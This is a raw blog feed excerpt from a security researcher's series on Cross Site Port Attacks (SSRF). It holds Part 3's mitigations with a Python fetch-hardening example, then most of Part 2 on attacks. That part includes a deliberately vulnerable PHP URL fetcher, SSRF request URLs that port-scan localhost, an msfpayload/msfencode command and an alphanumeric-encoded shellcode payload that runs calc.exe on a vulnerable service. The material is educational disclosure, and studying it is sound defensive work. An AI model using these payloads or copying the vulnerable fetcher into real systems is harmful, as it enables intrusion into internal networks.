&lt;a href="http://3.bp.blogspot.com/--U9BmYu9LJU/UKQF-bXTY_I/AAAAAAAAAoU/tUBIdb4UmHY/s1600/adobe_file_protocal_handler_resized_frosted.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="350" width="520" src="http://3.bp.blogspot.com/--U9BmYu9LJU/UKQF-bXTY_I/AAAAAAAAAoU/tUBIdb4UmHY/s1600/adobe_file_protocal_handler_resized_frosted.png" /&gt;&lt;/a&gt;&lt;/div&gt;


&lt;br/&gt;&lt;br/&gt;

&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-weight: normal;"&gt;How do you fix this?&lt;/span&gt; &lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
There are multiple ways of mitigating this vulnerability; the most effective and common techniques for thwarting XSPA are listed below:&lt;br/&gt;
1. Response Handling - Validating responses received from remote resources on the server side is the most basic mitigation and can be readily implemented. If a web application expects a specific content type from the remote server, programmatically ensure that the data received satisfies the checks imposed on the server before displaying or processing it for the client.
&lt;br/&gt;&lt;br/&gt;
2. Error handling and messages - Display generic error messages to the client in case something goes wrong. If content type validation fails, display a generic error such as "Invalid Data retrieved". Also ensure that the message is the same whether the request fails on the backend or invalid data is received; this prevents the application from being abused as a port scanner, because distinct error messages for closed and open ports will be absent. Under no circumstances should the raw response received from the remote server be displayed to the client.
&lt;br/&gt;&lt;br/&gt;
3. Restrict connectivity to HTTP based ports - This may not always be the brightest thing to do, but restricting the ports to which the web application can connect to HTTP ports like 80, 443, 8080, 8090 etc. lowers the attack surface. Several popular web applications on the Internet simply strip any port specification from the input URL and connect to the port determined by the protocol handler (http - 80, https - 443).
&lt;br/&gt;&lt;br/&gt;
4. Blacklist IP addresses - Internal IP addresses, localhost specifications and internal hostnames can all be blacklisted to prevent the web application from being abused to fetch data from or attack these devices. Implementing this also protects against attacks that need no response. For example, even if the first fix (above) is implemented, the request is still sent to the remote service; if the attack does not need to see the response (like a buffer overflow exploit), only this fix prevents the data from ever reaching the vulnerable device. Response handling is then not required at all, as the request was never made.
&lt;br/&gt;&lt;br/&gt;
5. Disable unwanted protocols - Allow only http and https when making requests to remote servers. Whitelisting these protocols prevents the web application from making requests over other protocols like file:///, gopher://, ftp:// and other URI schemes.
&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;
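A fetch front-end that applies all five fixes above in one place, written for this post as an added example (it is not the blog's own code). The `resolver` and `transport` callables are hypothetical injection points, and the fake DNS table and transport at the bottom are constructed so the policy can be exercised offline.

```python
"""Hardened fetch front-end for a "load image from URL" feature.

Added example (not the blog's own code): the five fixes above, in one place.
``resolver`` and ``transport`` are hypothetical injectable callables so the
policy runs offline; the fakes at the bottom are constructed for the demo.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http": 80, "https": 443}   # fix 5: scheme whitelist, default ports
ALLOWED_PORTS = {80, 443, 8080, 8090}          # fix 3: HTTP-style ports only
ALLOWED_CONTENT_TYPES = {"image/jpeg", "image/png", "image/gif"}  # fix 1
GENERIC_ERROR = "Invalid Data retrieved"       # fix 2: one message for every failure
AUDIT_LOG = []                                 # failure detail stays server side

class PolicyViolation(Exception):
    """Raised internally; the reason is logged, never shown to the client."""

def is_internal(ip_text):
    """Fix 4: loopback, RFC 1918, link-local (169.254.x), ULA, multicast, etc."""
    ip = ipaddress.ip_address(ip_text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                    # ::ffff:127.0.0.1 is still loopback
    return (not ip.is_global) or ip.is_multicast

def default_resolver(host):
    """System resolver; every A/AAAA answer is returned so each can be checked."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def validate_target(url, resolver=default_resolver):
    """Fixes 3, 4, 5: returns (scheme, host, port, ip, path) or raises.
    Connect to the returned ip, not the name, so a DNS answer cannot change
    between this check and the connection (DNS rebinding)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise PolicyViolation("scheme not allowed: %r" % parts.scheme)
    try:
        port = parts.port or ALLOWED_SCHEMES[scheme]   # .port rejects junk ports
    except ValueError:
        raise PolicyViolation("malformed port") from None
    if port not in ALLOWED_PORTS:
        raise PolicyViolation("port not allowed: %d" % port)
    host = parts.hostname
    if not host or host == "localhost" or host.endswith(".localhost"):
        raise PolicyViolation("host not allowed")
    try:
        ipaddress.ip_address(host)                     # IPv4, IPv6 or mapped literal
        addrs = [host]
    except ValueError:
        addrs = resolver(host)                         # names, incl. "127.1" style forms
    if not addrs or any(is_internal(a) for a in addrs):
        raise PolicyViolation("internal or unresolvable address: %r" % host)
    return scheme, host, port, addrs[0], parts.path or "/"

def handle_response(content_type, body):
    """Fix 1: release the body only when it carries an expected Content-Type."""
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type not in ALLOWED_CONTENT_TYPES:
        raise PolicyViolation("unexpected content type: %r" % media_type)
    return body

def safe_fetch(url, transport, resolver=default_resolver):
    """transport(ip, port, scheme, host, path) returns (content_type, body) or raises.
    Fix 2: policy failures, refused connections, timeouts and wrong content
    types all collapse into GENERIC_ERROR, so open and closed ports look alike."""
    try:
        scheme, host, port, ip, path = validate_target(url, resolver)
        content_type, body = transport(ip, port, scheme, host, path)
        return handle_response(content_type, body)
    except Exception as exc:           # raw response or socket error never reaches the client
        AUDIT_LOG.append("%s: %s" % (type(exc).__name__, exc))
        return GENERIC_ERROR

# Constructed offline stand-ins for the demo and tests (no real network access).
FAKE_DNS = {"example.com": ["93.184.216.34"], "intranet.corp": ["10.0.0.1"],
            "rebind.test": ["93.184.216.34", "127.0.0.1"]}  # one public, one loopback answer

def fake_resolver(host):
    return FAKE_DNS.get(host, [])

def fake_transport(ip, port, scheme, host, path):
    if path.endswith(".jpg"):
        return "image/jpeg", b"\xff\xd8\xff\xe0JFIF-demo-bytes"
    if path == "/robots.txt":
        return "text/plain", b"User-agent: *"        # fetched, but not an image
    raise ConnectionRefusedError("simulated closed port")

if __name__ == "__main__":
    for u in ("http://example.com/avatar.jpg", "file:///etc/passwd",
              "http://127.0.0.1:3306/test.txt", "http://rebind.test/avatar.jpg"):
        print(u, "=>", safe_fetch(u, fake_transport, fake_resolver))
```

Every rejected or failed request lands in AUDIT_LOG with its real reason, while the client only ever sees the one generic string.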

&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-weight: normal;"&gt;Conclusion&lt;/span&gt; &lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;
Using web applications to make requests to remote resources, the local network and even localhost is a technique that has been known to pentesters for some time now. It has been termed Server Side Request Forgery, Cross Site Port Attacks and even Server Side Site Scanning; the primary idea here is to present it to the community and show that this vulnerability is extremely common. XSPA, in the case of this research, can be used to proxy attacks via vulnerable web applications to remote servers and local systems.&lt;br/&gt;
&lt;br/&gt;
We have seen that XSPA can be used to port scan remote Internet facing servers, intranet devices and the local web server itself. Banner grabbing is also possible in some cases. XSPA can also be used to exploit vulnerable programs running on the Intranet or on the local web server. Fingerprinting intranet web applications using static default files &amp; application behaviour is possible. It is also possible in several cases to attack internal/external web applications that are vulnerable to GET parameter based vulnerabilities (SQLi via URL, parameter manipulation etc.). Lastly, XSPA has been used to document local file read capabilities using the file:/// protocol handler in Adobe's Omniture web application.
&lt;br/&gt;&lt;br/&gt;
Mitigating XSPA takes a combination of blacklisting IP addresses, whitelisting connect ports and protocols, and proper non-descriptive error handling.
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
In the next several posts I will publish disclosures regarding XSPA in several websites on the Internet which triggered the research into this vulnerability in the first place.
&lt;/span&gt;&lt;br/&gt;&lt;br/&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/riyazwalikar/~4/wdSzXE6iC9A" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.riyazwalikar.com/feeds/7293374345555452872/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-3.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/7293374345555452872?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4333330172780240225/posts/default/7293374345555452872?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/riyazwalikar/~3/wdSzXE6iC9A/cross-site-port-attacks-xspa-part-3.html" title="Cross Site Port Attacks - XSPA - Part 3" /><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="22" height="32" src="http://2.bp.blogspot.com/-Gt2oM9Ob-IU/UJzlXjWhBYI/AAAAAAAAAi8/_LtVk7nXhz8/s220/profile.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/--Re66ME7p30/UKP2MDwuEuI/AAAAAAAAAmk/kSTChWIpgW0/s72-c/jmx_console.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-3.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0QNSXwzfyp7ImA9WhNRGU8.&quot;"><id>tag:blogger.com,1999:blog-4333330172780240225.post-960139323829785061</id><published>2012-11-13T15:36:00.000-08:00</published><updated>2012-11-14T13:43:18.287-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-11-14T13:43:18.287-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cross Site Port Attacks" /><category 
scheme="http://www.blogger.com/atom/ns#" term="appsecusa" /><category scheme="http://www.blogger.com/atom/ns#" term="XSPA" /><category scheme="http://www.blogger.com/atom/ns#" term="owasp" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="ssrf" /><title>Cross Site Port Attacks - XSPA - Part 2</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;This is the second post in the 3 part series that explains XSPA, the attacks and possible countermeasures.
&lt;br /&gt;&lt;br /&gt;
Read &lt;a href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html"&gt;Cross Site Port Attacks - XSPA - Part 1&lt;/a&gt;&lt;br /&gt;
Read &lt;a href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-3.html"&gt;Cross Site Port Attacks - XSPA - Part 3&lt;/a&gt;
&lt;br /&gt;&lt;br /&gt;

&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-weight: normal;"&gt;Attacks&lt;/span&gt; &lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;XSPA allows attackers to target the server infrastructure, mostly the intranet of the web server, the web server itself and any public Internet facing server as well. Currently, I have come across the following five different attacks that can be launched because of XSPA:&lt;br /&gt;
1. Port Scanning remote Internet facing servers, intranet devices and the local web server itself. Banner grabbing is also possible in some cases.&lt;br /&gt;
2. Exploiting vulnerable programs running on the Intranet or on the local web server&lt;br /&gt;
3. Fingerprinting intranet web applications using standard application default files &amp; behavior&lt;br /&gt;
4. Attacking internal/external web applications that are vulnerable to GET parameter based vulnerabilities (SQLi via URL, parameter manipulation etc.)&lt;br /&gt;
5. Reading local web server files using the file:/// protocol handler.&lt;br /&gt;&lt;br /&gt;

Most web server architectures allow the web server to access the Internet as well as services running on the intranet. The following diagram shows the various destinations to which requests can be made:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-mzegxfaSdUs/UKLJ5cNq4nI/AAAAAAAAAj4/BSVgZlZIFGE/s1600/xspa_reach_via_server.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="300" width="520" src="http://4.bp.blogspot.com/-mzegxfaSdUs/UKLJ5cNq4nI/AAAAAAAAAj4/BSVgZlZIFGE/s1600/xspa_reach_via_server.png" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;

Let us now look at some of the attacks that are possible with XSPA. These are attacks that I have come across during my Bug Bounty research and XSPA is not limited to them. A determined, intuitive attacker can come up with other scenarios as well.&lt;br /&gt;&lt;br/&gt;

&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-weight: normal;"&gt;&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Attacks - Port Scanning using XSPA&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Consider a web application that provides a common functionality that allows a user to input a link to an external image from a third party server. Most social networking sites have this functionality that allows users to update their profile image by either uploading an image or by providing a URL to an image hosted elsewhere on the Internet.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;
A user is expected (in a utopian world) to enter a valid URL pointing to an image on the Internet. URLs of the following forms would be considered valid:
&lt;ul&gt;
&lt;li&gt;http://example.com/dir/public/image.jpg&lt;/li&gt;
&lt;li&gt;http://example.com/dir/images/&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;

The second URL is valid if the served Content-Type is an image (http://www.w3.org/Protocols/rfc1341/4_Content-Type.html). Based on the web application's server side logic, the image is downloaded to the server, a new URL is created and the image is then displayed to the user from that server URL. So even if you specify the image to be at
&lt;br /&gt;
http://example.com/dir/public/image.jpg&lt;br/&gt;
the final image URL would be at&lt;br /&gt;
http://gravatar.com/user_images/username/image.jpg.
&lt;br /&gt;&lt;br/&gt;If an image is not found at the user supplied URL, the web application will normally tell the user so. However, if the remote server hosting the image does not exist, or exists but has no HTTP service running on the requested port, it gets tricky. Most web applications generate error messages that inform the user of the status of this request. An attacker can specify a non-standard yet valid URI (according to RFC 3986) that carries a port specification. Examples of such URIs would be:
&lt;ul&gt;
&lt;li&gt;http://example.com:8080/dir/images/&lt;/li&gt;
&lt;li&gt;http://example.com:22/dir/public/image.jpg&lt;/li&gt;
&lt;li&gt;http://example.com:3306/dir/images/&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;


&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;In all probability you would find a web application on port 8080 and not on 22 (SSH) or 3306 (MySQL). However, the backend logic of the web server, in all observed cases, will connect to the user specified URL on the mentioned port using whatever APIs and framework it is built on, as these are valid HTTP URLs. In the case of most TCP services, a banner is sent as soon as the socket connection is created, and since most banners (containing juicy information) are printable ASCII, they can be displayed as raw HTML via the response handler. If the server parses the data, non-HTML data may not be displayed; in such cases unique error messages, response byte size and response timing can be used to identify port status, providing an avenue for port scanning remote servers through the vulnerable web application. An attacker can analyze the returned error messages and identify open and closed ports based on unique error responses. These responses may be raw socket errors (like "Connection refused" or timeouts) or may be customized by the application (like "Unexpected header found" or "Service was not reachable"). Instead of providing a URL to a remote server, URLs to localhost (http://127.0.0.1:22/image.jpg) can also be used to port scan the local server itself!&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
The following PHP snippet, which hands a user supplied URL straight to cURL and echoes whatever comes back, can be abused to port scan devices:
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
&amp;lt;?php &lt;br /&gt;
  // Deliberately XSPA-vulnerable fetcher: the user supplied URL goes straight to cURL&lt;br /&gt;
  // and the raw response (or cURL's error output) is echoed back to the client.&lt;br /&gt;
  if (isset($_POST['url']))&lt;br /&gt;
  {&lt;br /&gt;
    $link = $_POST['url'];&lt;br /&gt;
    $filename = './curled/'.rand().'.txt'; // temporary file for the fetched body&lt;br /&gt;
    $curlobj = curl_init($link);&lt;br /&gt;
    $fp = fopen($filename,"w");&lt;br /&gt;
&lt;br /&gt;
    curl_setopt($curlobj, CURLOPT_FILE, $fp);   // write the response body to the file&lt;br /&gt;
    curl_setopt($curlobj, CURLOPT_HEADER, 0);   // body only, no response headers&lt;br /&gt;
    curl_exec($curlobj);&lt;br /&gt;
    curl_close($curlobj);&lt;br /&gt;
    fclose($fp);&lt;br /&gt;
    $result = file_get_contents($filename);     // empty string if nothing was fetched&lt;br /&gt;
    echo $result;                               // raw remote response goes to the client&lt;br /&gt;
  }&lt;br /&gt;
?&amp;gt;&lt;br /&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;


&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;The following is a screengrab of the above code retrieving robots.txt from http://www.twitter.com:&lt;br/&gt;&lt;br /&gt;
Request: http://www.twitter.com/robots.txt&lt;br/&gt;&lt;br/&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-2OVdY1W3Zec/UKLOdV90pAI/AAAAAAAAAkM/4bSLQM8HocY/s1600/robots.txt.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="420" width="520" src="http://2.bp.blogspot.com/-2OVdY1W3Zec/UKLOdV90pAI/AAAAAAAAAkM/4bSLQM8HocY/s1600/robots.txt.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br /&gt;&lt;br /&gt;

For the same page, if a request is made to fetch data from an open port running a non-HTTP service:&lt;br /&gt;&lt;br/&gt;
Request: http://scanme.nmap.org:22/test.txt&lt;br/&gt;&lt;br/&gt;


&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-URiXTgCdPq4/UKLPrAlpt1I/AAAAAAAAAkY/RiJIdHd7Qvw/s1600/non_http_port_connect.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="240" width="520" src="http://2.bp.blogspot.com/-URiXTgCdPq4/UKLPrAlpt1I/AAAAAAAAAkY/RiJIdHd7Qvw/s1600/non_http_port_connect.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br /&gt;&lt;br /&gt;

For a closed port, an application specific error is displayed:&lt;br /&gt;&lt;br/&gt;
Request: http://scanme.nmap.org:25/test.txt&lt;br /&gt; &lt;br /&gt;


&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-K08TqnaLiCg/UKLQPqOo5OI/AAAAAAAAAkk/dBiifukgLAE/s1600/closed_port.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="200" width="520" src="http://3.bp.blogspot.com/-K08TqnaLiCg/UKLQPqOo5OI/AAAAAAAAAkk/dBiifukgLAE/s1600/closed_port.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br/&gt;&lt;br/&gt;


The different responses received allow us to port scan devices using the vulnerable web application server as a proxy. This can easily be scripted to achieve automation and cleaner results. I will be (in later posts) showing how this attack was possible on Facebook, Google, Mozilla, Pinterest, Adobe and Yahoo!&lt;br/&gt;&lt;br/&gt;

An attacker can also modify the request URLs to scan the internal network or the local server itself. For example:&lt;br/&gt;&lt;br/&gt;

Request: http://127.0.0.1:3306/test.txt&lt;br/&gt;&lt;br/&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-d6KkEX_TCac/UKLQxi9MESI/AAAAAAAAAkw/nzzg4lT6Qc0/s1600/mysql_error_localhost.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="220" width="520" src="http://3.bp.blogspot.com/-d6KkEX_TCac/UKLQxi9MESI/AAAAAAAAAkw/nzzg4lT6Qc0/s1600/mysql_error_localhost.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br/&gt;&lt;br/&gt;

In most web applications on the Internet, barring a few, banner grabbing may not be possible, in which case application specific error messages, response byte size, server response times and changes in HTML source can be used as unique fingerprints to identify port status. The following screengrabs show port scanning via XSPA in Google's Webmasters web application. Note the application specific error messages that can be used to script the vulnerability and automate scanning of Internet/Intranet devices. Google has now fixed this issue (and my name was listed in the prestigious &lt;a href="http://www.google.com/about/appsecurity/hall-of-fame/reward/" target="_blank"&gt;Google Hall of Fame&lt;/a&gt; for security researchers):&lt;br/&gt;&lt;br/&gt;


&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-9us1HoPE9gE/UKLRP-HRAvI/AAAAAAAAAk8/vBbmDdZ0mW8/s1600/http_open_port.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="320" width="520" src="http://1.bp.blogspot.com/-9us1HoPE9gE/UKLRP-HRAvI/AAAAAAAAAk8/vBbmDdZ0mW8/s1600/http_open_port.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br/&gt;
&lt;br/&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-2G131e3vcKM/UKLRn0-fesI/AAAAAAAAAlI/AFrRq0i-FG4/s1600/non_http_open_port.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="320" width="520" src="http://3.bp.blogspot.com/-2G131e3vcKM/UKLRn0-fesI/AAAAAAAAAlI/AFrRq0i-FG4/s1600/non_http_open_port.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br/&gt;
&lt;br/&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-3RafwD4r98I/UKLSB8dcipI/AAAAAAAAAlU/PeO4uGdsSqg/s1600/closed_port.PNG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="320" width="520" src="http://4.bp.blogspot.com/-3RafwD4r98I/UKLSB8dcipI/AAAAAAAAAlU/PeO4uGdsSqg/s1600/closed_port.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;

&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-weight: normal;"&gt;Attacks - Exploiting vulnerable network programs&lt;/span&gt; &lt;/span&gt;&lt;/h2&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;Most developers in the real world write code without incorporating much security, which is why, even after a decade of being documented, threats like buffer overflows and format string vulnerabilities are still found in applications. For applications built in-house to perform specific tasks, security is almost never on the list of priorities, hence attacking them gives easy access to the internal network. XSPA allows attackers to send data to user controlled addresses and ports on which vulnerable services could be listening. These can be exploited using XSPA to execute code on the remote/local server and gain a reverse shell (or perform any other attacker desired activity).&lt;br/&gt;&lt;br/&gt;

If we look at the flow of an XSPA attack, we can see that we control the part after the port specification. In simpler terms, we control the resource that we are asking the web server to fetch from the remote/local server. The web server creates a GET (or POST, mostly GET) request on the backend and connects to the attacker specified service and issues the following HTTP request:&lt;br/&gt;&lt;br/&gt;

&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
GET /attacker_controlled_resource HTTP/1.1&lt;br/&gt;
Host: hostname&lt;br/&gt;&lt;br/&gt;
&lt;/span&gt;&lt;/div&gt;

Notice that we do not need to be concerned about most of the structure of the backend request, as we control the most important part of it: the resource specification. For example, in the following screengrab you can see that a program listening on port 8987 on the local server accepts input and prints "Hello GET /test.txt HTTP/1.1, The Server Time is: [server time]". The "GET /test.txt HTTP/1.1" is sent by the web server to the program as part of its request creation process. If the program is vulnerable to a buffer overflow, as user input is being used to create the output, the attacker could pass an overly long string and crash the program.&lt;br/&gt;&lt;br/&gt;

Request: http://127.0.0.1:8987/test.txt&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-YgFIo632gJU/UKLT2rAZUKI/AAAAAAAAAlg/1-8erdZOYGA/s1600/vulnerable_program_localhost.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="200" width="520" src="http://4.bp.blogspot.com/-YgFIo632gJU/UKLT2rAZUKI/AAAAAAAAAlg/1-8erdZOYGA/s1600/vulnerable_program_localhost.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br /&gt;
&lt;br /&gt;

Request: http://127.0.0.1:8987/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br/&gt;&lt;br/&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-PMfnvvt4gho/UKLUX9G5qwI/AAAAAAAAAls/kZaRtuhMoww/s1600/network_hello_crash.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="300" width="520" src="http://1.bp.blogspot.com/-PMfnvvt4gho/UKLUX9G5qwI/AAAAAAAAAls/kZaRtuhMoww/s1600/network_hello_crash.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br/&gt;
&lt;br/&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-Fu6qadXk1Co/UKLUYV0MSeI/AAAAAAAAAl4/ljUGX3OBY5w/s1600/exploitable_program.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="300" width="520" src="http://2.bp.blogspot.com/-Fu6qadXk1Co/UKLUYV0MSeI/AAAAAAAAAl4/ljUGX3OBY5w/s1600/exploitable_program.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br/&gt;
&lt;br/&gt;

On testing the vulnerable copy on a local installation, we can see that EIP can be controlled and ESP points to our data. Calculating the correct offset for EIP and building the exploit is beyond this blog post; however, the folks at &lt;a href="https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows"&gt;Corelan&lt;/a&gt; have a brilliant series of tutorials on building exploits for vulnerable programs. One important point to note, however, is that HTTP, being a text-based protocol, may not handle the non-printable unicode characters found in exploit code properly. In such a situation, we can use msfencode (part of the Metasploit Framework) to encode the exploit payload as alphanumeric text using the following command:&lt;br/&gt;&lt;br/&gt;

&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
msfpayload windows/exec CMD=calc.exe R | msfencode BufferRegister=ESP -e x86/alpha_mixed
&lt;/span&gt;&lt;/div&gt;

&lt;br/&gt;

The result? The following alphanumeric text (along with padding AAAAAAs, the static JMP ESP address and the shellcode) that can now be sent via the web application to the vulnerable program:&lt;br/&gt;
&lt;br/&gt;

&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@'ßwTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlhhmYUPWpWp3Pk9he01xRSTnkpRfPlKPRtLLKPR24NkbR7XDOMgszuvVQ9oeaKpllgL3QQl5RFLWPiQJodM31JgKRHpaBPWNk3bvpLKsrWLwqZpLK1P0xMU9PSDCz7qZpf0NkQX6xnk2xUps1n3xcgL3yNkednkVayF4qKO5aKpnLIQJo4M31O76XIpbUzTdC3MHxGKamvDbU8bchLKShEtgqhSQvLKtLRkNkShuLgqZslK5TlKVaZpoy3tGTWTqKqKsQ0YSjRqyoKP2xCoSjnkwb8kLFqM0jFaNmLElyc05PC0pPsX6QlK0oOwkOyEOKhph5920VBHY6MEoMOmKON5Uls6SLUZMPykip2UfeoK3wfs422OBJs0Sc9oZuCSPaPl3SC0AA
&lt;/span&gt;&lt;/div&gt;

&lt;br/&gt;
&lt;br/&gt;
Successful exploitation leads to the calculator executing on the server. The shellcode can be replaced with other payloads as well (a reverse shell, perhaps?)&lt;br/&gt;&lt;br/&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-SlTcE-PV33Q/UKLV9CdzFUI/AAAAAAAAAmE/OUW4DPPHE6g/s1600/calc_exec.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="350" width="520" src="http://4.bp.blogspot.com/-SlTcE-PV33Q/UKLV9CdzFUI/AAAAAAAAAmE/OUW4DPPHE6g/s1600/calc_exec.png" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br/&gt;
&lt;br/&gt;

&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-family: &amp;quot;Trebuchet MS&amp;quot;,sans-serif;"&gt;&lt;span style="font-weight: normal;"&gt;Attacks - Fingerprinting Intranet Web Applications&lt;/span&gt; &lt;/span&gt;&lt;/h2&gt;

Identifying internal applications via XSPA would be one of the first steps an attacker takes to get into the network from outside. Fingerprinting the type and version, whether it's a publicly available framework, a blogging platform, an application module or simply a customized public CMS, is essential in identifying vulnerabilities that can then be exploited to gain access. &lt;br/&gt;
&lt;br/&gt;

